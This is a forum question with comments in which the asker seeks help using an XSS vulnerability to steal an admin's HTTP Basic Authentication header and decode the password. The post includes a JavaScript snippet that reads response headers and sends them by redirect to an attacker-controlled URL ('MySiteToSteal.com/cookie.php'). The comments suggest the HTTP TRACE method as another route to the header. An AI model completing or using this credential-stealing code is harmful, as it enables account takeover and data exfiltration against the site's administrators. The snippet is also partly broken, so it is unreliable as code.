# XSS Steal Authetification Basic with xmlhttprequest

Tags: javascript, security, xmlhttprequest, xss

I'm working on security, and I need one thing to exploit my XSS vulnerability:

My goal is:
 - Get the Authentification Basic header from the admin.

With the Authentification Basic, i can decode the base 64 and get the password from the admin.

[image: Screenshot of headers]

Here's my script to have the red rectangle:

```
var req = new XMLHttpRequest();
req.open('GET', document.location, false);
req.send(null);
var headers = req.getResponseHeader().toLowerCase();
document.location="http://MySiteToSteal.com/cookie.php?cookies=" + headers;
```

Can someone help me to have the good header? I need the green rectangle :D

Comment: It isn't clear to me which end of the conversation you are on, and what you are trying to exploit.  The Authentication header is sent from the client to the server, but your code is running on the client?  And, what does this have to do with cookies?

Comment: How is that request sent that you intercepted there? Show us the code of that. Usually you'd need to intercept the password before it is attached to the request.

Comment: My code is running on the client. I don't have cookies, only this Basic Authentification

Comment: Where does the basic authentification come from? Does the admin enter it in the browser's prompt every time?

Comment: It come from when the admin enter in the browser, like an htaccess.

Comment: You mean `.htpasswd` prompting?

Comment: Yes, all time when you open your browser

Comment: Like that http://i.stack.imgur.com/fBtBq.png
I think it's like htaccess/ htpasswrd

Comment: When the admin try to connect, it will prompt one time per session of browser. For me, it's possible to get his basic authentification :D.

When he execute my XSS, he's connected.

Comment: try using the http TRACE method. there might be some protection in place to prevent it though. edit: yeah this shouldn't work http://xhr.spec.whatwg.org/#the-open()-method

Comment: I try TRACE method... here's the result --> http://i.stack.imgur.com/VNWzQ.png

Someone have an idea for another way?

I found this code --> http://schmoil.blogspot.ch/2008/03/stealing-basic-auth-with-persistent-xss.html 

Don't work...